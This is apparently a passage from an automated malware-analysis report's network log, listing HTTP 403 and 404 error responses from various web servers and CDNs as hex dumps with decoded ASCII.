6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:30 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:30 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd3kzTVEeNf/iB9j3c1cpqs,qquldgcFrj2n046g4RNSVL5pznunIc8dqFlAvDKHESQ=X-Wix-Request-Id: 1690487010.82318576407516686X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:43:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=20X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: cf9dfb9e-2feb-4810-961f-2794b6720dd7CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DMkQyu8zCcjl05mycLxs1vuBFRh8hh%2BHd%2FpIt2k%2F0lvJ6iJfLaV9kwc8dYd4rCwaHyImefwXreLDLQATUw8mYYxFiqJpA2nnc9yosYBCkRYeWd2V%2B0C34nhFha2G7idekg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=154.000044Server: cloudflareCF-RAY: 7ed75f34b9bf915e-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:43:48 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qkyRQJ7a63dLUR6h57Dd7d860KariO389J8%2BR8z5y%2BYksSkld0W5cktB%2BIkK4ZkwQ9XtPVzXZXHiss1%2FlECkN7LRxuBiAj1TVQWtzAnvtcjfT0dPjp5GiAS9XlUsGApI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75f3cba543a82-FRAData Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudfl
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1690487013.9054077255147794X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Thu, 27 Jul 2023 19:43:33 GMTX-Served-By: cache-lin2290020-LINX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4K7wzLzv1xbqJ0M0SLNsFMg,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:43:33 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:43:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=14X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: e6eed859-5767-4d2f-a374-ea8ec7e46701CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Sq9MmZB2bU1BCicexFVnwGjpPNioK4x6srm5JAkDxQWKtoB7qYRNERSurFjjsJll3XjpTZQtdqgIbYygceKQHJvJetpFMzJrz%2B7qmIx26x1JhBivoNBeU6qJNfY7zHU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=148.000002Server: cloudflareCF-RAY: 7ed75f3dcca82bb0-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:34 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cJnpli81NHkj%2F5B0hoiv8RGDSaFc3VoxZfqu5eJ4GcXgIXSwuFQ8fEP3DNGIMciM7TCndYqDjH3H3Oe1nXaDMsuuzs7W3%2F3U358HFCi%2BPVasmlvVUavOVkfdGeRG4Vs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75f400c26195e-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:34 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AZa%2FihanTfIHdDsU4A48g01qyWONDjc%2F%2Bo4OOW4O%2FXsAiknp85D26fKGLoUWLoGVQhd1%2FpJ0K60cu%2FHSZiQMhPT1ff3a0Smbb9Sp08k0%2Bkzs%2FH49dYIOMqkhXVI6EG4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75f403c58195e-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveServer: ZENEDGEX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: 2925b2a1d9e76ed5cdb21e640b51b6c35438b497Date: Thu, 27 Jul 2023 19:43:35 GMTData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 38 34 36 30 22 2c 20 31 36 39 30 34 38 36 39 38 31 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 30 34 38 36 39 38 31 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 33 36 31 33 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 37 20 4a 75 6c 20 32 30 32 33 20 31 39 3a 34 35 3a 33 35 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC8460", 1690486981, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1690486981 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:43:35 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
